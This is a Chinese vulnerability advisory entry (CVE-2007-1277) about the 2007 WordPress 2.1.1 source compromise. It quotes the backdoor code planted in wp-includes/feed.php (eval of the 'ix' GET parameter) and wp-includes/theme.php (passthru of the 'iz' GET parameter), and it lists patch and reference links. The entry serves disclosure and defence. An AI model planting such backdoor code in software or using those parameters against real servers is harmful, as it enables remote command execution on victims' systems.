漏洞信息详情
WordPress 2.1.1远程命令执行后门漏洞
- CNNVD编号:CNNVD-200703-170
- 危害等级: 高危
- CVE编号: CVE-2007-1277
- 漏洞类型: 输入验证
- 发布时间: 2007-03-05
- 威胁类型: 远程
- 更新时间: 2009-03-16
- 厂 商: wordpress
- 漏洞来源: Ivan Fratric※ ifse...
漏洞简介
WordPress是一款免费的论坛Blog系统。 WordPress提供软件下载的网站被入侵,入侵者修改了软件代码码植入远程可执行命令的后门,远程攻击者可能利用这个后门以Web进程权限在安装了恶意版本WordPress的服务器上执行任意命令。 被修改的文件是wp-includes/feed.php和wp-includes/theme.php,被添加了如下代码: 在wp-includes/feed.php文件中: function comment_text_phpfilter($filterdata) { eval($filterdata); } ... if ($_GET[\"ix\"]) { comment_text_phpfilter($_GET[\"ix\"]); } eval()调用会执行通过ix变量传入的PHP代码。 在wp-includes/theme.php文件中: function get_theme_mcommand($mcds) { passthru($mcds); } ... if ($_GET[\"iz\"]) { get_theme_mcommand($_GET[\"iz\"]); } passthru()会执行通过iz变量传入的PHP代码。
漏洞公告
目前厂商已经发布了升级补丁以修复这个安全问题,补丁下载链接:
http://wordpress.org/download
参考网址
来源: VU#641456 名称: VU#641456 链接:http://www.kb.cert.org/vuls/id/641456 来源: VU#214480 名称: VU#214480 链接:http://www.kb.cert.org/vuls/id/214480 来源: XF 名称: wordpress-theme-command-execution(32807) 链接:http://xforce.iss.net/xforce/xfdb/32807 来源: XF 名称: wordpress-feed-code-execution(32804) 链接:http://xforce.iss.net/xforce/xfdb/32804 来源: BID 名称: 22797 链接:http://www.securityfocus.com/bid/22797 来源: BUGTRAQ 名称: 20070303 WordPress source code compromised to enable remote code execution 链接:http://www.securityfocus.com/archive/1/archive/1/461794/100/0/threaded 来源: VUPEN 名称: ADV-2007-0812 链接:http://www.frsirt.com/english/advisories/2007/0812 来源: wordpress.org/ 链接:http://wordpress.org/development/2007/03/upgrade-212/ 来源: SECUNIA 名称: 24374 链接:http://secunia.com/advisories/24374 来源: MISC 链接:http://ifsec.blogspot.com/2007/03/wordpress-code-compromised-to-enable.HTML
受影响实体
- Wordpress Wordpress:2.1.1
补丁
暂无
评论